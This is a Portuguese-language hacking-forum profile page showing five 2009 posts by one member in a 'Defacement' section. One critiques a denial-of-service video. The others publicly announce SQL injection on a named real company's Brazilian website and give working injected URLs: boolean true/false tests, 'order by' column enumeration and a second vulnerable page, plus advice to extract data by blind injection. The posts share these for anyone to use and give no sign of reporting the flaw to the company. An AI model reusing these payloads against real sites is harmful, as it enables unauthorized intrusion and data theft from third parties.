Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - Mago__

Pages1
#1
Defacement / Re: [Video] Fazendo um ataque DDos
25 de September , 2009, 09:57:40 AM
Samukt, obrigado pelo vídeo e por nos mostrar seu conhecimento. Mas gostaria de fazer algumas observações e críticas construtivas.

1. Para se pegar um IP de um site, pode-se ir no DOS e digitar ping www.site.qualquercoisa e nos dará o IP também.  ;)

2. Isto não é um ataque DDoS [nestes ataques, o "D" (ou os "D"s) e "S" ficam em maiúsculo, o "o" em minúsculo]. Um ataque DDoS é assim chamado pq significa Distributed Denial of Service, ou seja, o DDoS é, por definição, um ataque distribuído. Provavelmente usando uma rede de computadores zumbis. Neste caso você fez um ataque DoS (Denial of Service) pois estava somente você.

3. Acho muito difícil que o site realmente tenha caído. Estes progamas de ataque DoS ou programa de escaneamento como o NMap consomem muito da sua conexão e, algumas vezes, chegam a derrubar sua conexão. É exatamente por isso que o NMap tem a opção -max-rate, para você controlar quantos pacotes podem ser enviados por segundo. O que penso que aconteceu foi sua conexão ter caído. Neste caso você pode reiniciar seu modem e ver se o site realmente caiu ou foi você que caiu.

Abraços
#2
Defacement / Re: SQL Injection no Mcdonalds encontrado por mim!
07 de May , 2009, 12:13:39 PM
Apenas para provar. O link original era: http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84&x=33&y=14

Altere para http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84 and 1=1 --

Veja que não dá nenhum erro. Agora tente:

http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84 and 1=0 --

Agora deu erro.

Descubra o número de tabelas por Order by:

http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84 order by 1 --

http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=84 order by 2 --

Enfim. Neste site você deve conseguir tudo por Blind SQL Injection.

Abraços
#3
Defacement / Re: SQL Injection no Mcdonalds encontrado por mim!
07 de May , 2009, 08:19:16 AM
Reeves, isto ocorre pq coloquei cmbCategoria=-1. Por isso apareceu [Nenhum conteúdo foi localizado para a expressão "". ]

E só coloquei algo que mostre o SQL Injection. Experimente http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=-1%20order%20by%204%20-- e verá o SQL Injection.

http://www.mcdonalds.com.br/mulher/entre_amigas_home.asp?cod=20%20order%20by%201%20-- Esta página também é vulnerável.

Enfim.
#4
Defacement / Re: SQL Injection no Mcdonalds encontrado por mim!
06 de May , 2009, 08:19:49 PM
Agora que vi que postei na seção errada. Perdão.
#5
Defacement / SQL Injection no Mcdonalds encontrado por mim!
06 de May , 2009, 08:16:48 PM
Para quem quiser. Vejam:

http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=-1%20order%20by%201,2,3%20desc%20--

Abraços
Pages1